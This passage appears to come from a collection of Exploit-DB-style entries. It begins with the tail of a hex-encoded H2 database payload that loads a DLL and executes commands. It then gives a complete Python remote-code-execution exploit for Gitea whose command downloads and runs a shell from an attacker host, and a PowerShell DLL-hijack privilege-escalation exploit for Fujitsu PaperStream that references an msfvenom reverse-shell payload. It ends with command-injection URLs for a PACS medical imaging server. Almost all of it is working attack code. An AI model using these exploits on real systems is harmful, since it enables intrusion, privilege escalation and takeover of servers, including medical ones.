R(0x00),CHAR(0x78),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0xbd),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x8c),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x17),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x8f),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xbc),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xd7),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x18),CHAR(0x00),CHAR(0x00),CHAR(0x11),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x5d),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x88),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x88),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x9d),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xd4),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x8d),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x1a),CHAR(0x00),CHAR(0x00),CHAR(0x1b),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xb2),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xac),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1b),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x98),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x5e),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x9c),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x9c),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x7d),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x3a),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x32),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x38),CHAR(0x00),CHAR(0x00),CHAR(0x46),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x6c),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x7c),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0x39),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xa0),CHAR(0xf0),CHAR(0xa0),CHAR(0xf8),CHAR(0xa0),CHAR(0x00),CHAR(0xa1),CHAR(0x08),CHAR(0xa1),CHAR(0xc8),CHAR(0xa4),CHAR(0xd0),CHAR(0xa4),CHAR(0x68),CHAR(0xa5),CHAR(0x80),CHAR(0xa5),CHAR(0x88),CHAR(0xa5),CHAR(0x28),CHAR(0xa6),CHAR(0x30),CHAR(0xa6),CHAR(0x38),CHAR(0xa6),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),'"'), 'ISO-8859-1', '', '', '', '', ''); -- Load native library CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll'); -- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
  23. # Exploit Title: Gitea 1.7.5 - Remote Code Execution # Date: 2020-05-11 # Exploit Author: 1F98D # Original Author: LoRexxar # Software Link: https://gitea.io/en-us/ # Version: Gitea before 1.7.6 and 1.8.x before 1.8-RC3 # Tested on: Debian 9.11 (x64) # CVE: CVE-2019-11229 # References: # https://medium.com/@knownsec404team/analysis-of-cve-2019-11229-from-git-config-to-rce-32c217727baa # # Gitea before 1.7.6 and 1.8.x before 1.8-RC3 mishandles mirror repo URL settings, # leading to authenticated remote code execution. # #!/usr/bin/python3 import re import os import sys import random import string import requests import tempfile import threading import http.server import socketserver import urllib.parse from functools import partial USERNAME = "test" PASSWORD = "password123" HOST_ADDR = '192.168.1.1' HOST_PORT = 3000 URL = 'http://192.168.1.2:3000' CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell' # Login s = requests.Session() print('Logging in') body = { 'user_name': USERNAME, 'password': PASSWORD } r = s.post(URL + '/user/login',data=body) if r.status_code != 200: print('Login unsuccessful') sys.exit(1) print('Logged in successfully') # Obtain user ID for future requests print('Retrieving user ID') r = s.get(URL + '/') if r.status_code != 200: print('Could not retrieve user ID') sys.exit(1) m = re.compile("<meta name=\"_uid\" content=\"(.+)\" />").search(r.text) USER_ID = m.group(1) print('Retrieved user ID: {}'.format(USER_ID)) # Hosting the repository to clone gitTemp = tempfile.mkdtemp() os.system('cd {} && git init'.format(gitTemp)) os.system('cd {} && git config user.email [email protected] && git config user.name x && touch x && git add x && git commit -m x'.format(gitTemp)) os.system('git clone --bare {} {}.git'.format(gitTemp, gitTemp)) os.system('cd {}.git && git update-server-info'.format(gitTemp)) handler = partial(http.server.SimpleHTTPRequestHandler,directory='/tmp') socketserver.TCPServer.allow_reuse_address = True httpd = socketserver.TCPServer(("", HOST_PORT), handler) t = threading.Thread(target=httpd.serve_forever) t.start() print('Created temporary git server to host {}.git'.format(gitTemp)) # Create the repository print('Creating repository') REPO_NAME = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'uid': USER_ID, 'repo_name': REPO_NAME, 'clone_addr': 'http://{}:{}/{}.git'.format(HOST_ADDR, HOST_PORT, gitTemp[5:]), 'mirror': 'on' } r = s.post(URL + '/repo/migrate', data=body) if r.status_code != 200: print('Error creating repo') httpd.shutdown() t.join() sys.exit(1) print('Repo "{}" created'.format(REPO_NAME)) # Inject command into config file print('Injecting command into repo') body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'mirror_address': 'ssh://example.com/x/x"""\r\n[core]\r\nsshCommand="{}"\r\na="""'.format(CMD), 'action': 'mirror', 'enable_prune': 'on', 'interval': '8h0m0s' } r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) if r.status_code != 200: print('Error injecting command') httpd.shutdown() t.join() sys.exit(1) print('Command injected') # Trigger the command print('Triggering command') body = { '_csrf': urllib.parse.unquote(s.cookies.get('_csrf')), 'action': 'mirror-sync' } r = s.post(URL + '/' + USERNAME + '/' + REPO_NAME + '/settings', data=body) if r.status_code != 200: print('Error triggering command') httpd.shutdown() t.join() sys.exit(1) print('Command triggered') # Shutdown the git server httpd.shutdown()
  24. # Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation # Exploit Author: 1F98D # Original Author: securifera # Date: 12 May 2020 # Vendor Hompage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html # CVE: CVE-2018-16156 # Tested on: Windows 10 x64 # References: # https://www.securifera.com/advisories/cve-2018-16156/ # https://github.com/securifera/CVE-2018-16156-Exploit # A DLL hijack vulnerability exists in the FJTWSVIC service running as part of # the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches # for a writable location, copies the specified DLL to that location and then # triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32 # named pipe. $ErrorActionPreference = "Stop" # Example payload generated as follows # msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444 $PayloadFile = "C:\Windows\Temp\UninOldIS.dll" if ((Test-Path $PayloadFile) -eq $false) { Write-Host "$PayloadFile not found, did you forget to upload it?" Exit 1 } # Find Writable Location $WritableDirectory = $null $Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path $Path -Split ";" | % { try { [IO.File]::OpenWrite("$_\x.txt").close() Remove-Item "$_\x.txt" $WritableDirectory = $_ } catch {} } if ($WritableDirectory -eq $null) { Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable" Exit 1 } Write-Host "Writable location found, copying payload to $WritableDirectory" Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll" Write-Host "Payload copied, triggering..." $client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation) $reader = $null $writer = $null try { $client.Connect() $reader = New-Object System.IO.StreamReader($client) $writer = New-Object System.IO.StreamWriter($client) $writer.AutoFlush = $true $writer.Write("ChangeUninstallString") $reader.ReadLine() } finally { $client.Dispose() } Write-Host "Payload triggered"
  25. # Exploit Title: ECSIMAGING PACS 6.21.5 - Remote code execution # Date: 06/01/2021 # Exploit Author: shoxxdj # Vendor Homepage: https://www.medicalexpo.fr/ # Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 ) # Tested on: Linux ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter "file" on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access : /showfile.php?file=/etc/sudoers [...] www-data ALL=NOPASSWD: ALL [...] Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/ /showfile.php?file=;sudo$IFS-l [...] User www-data may run the following commands on this host: (root) NOPASSWD: ALL [...]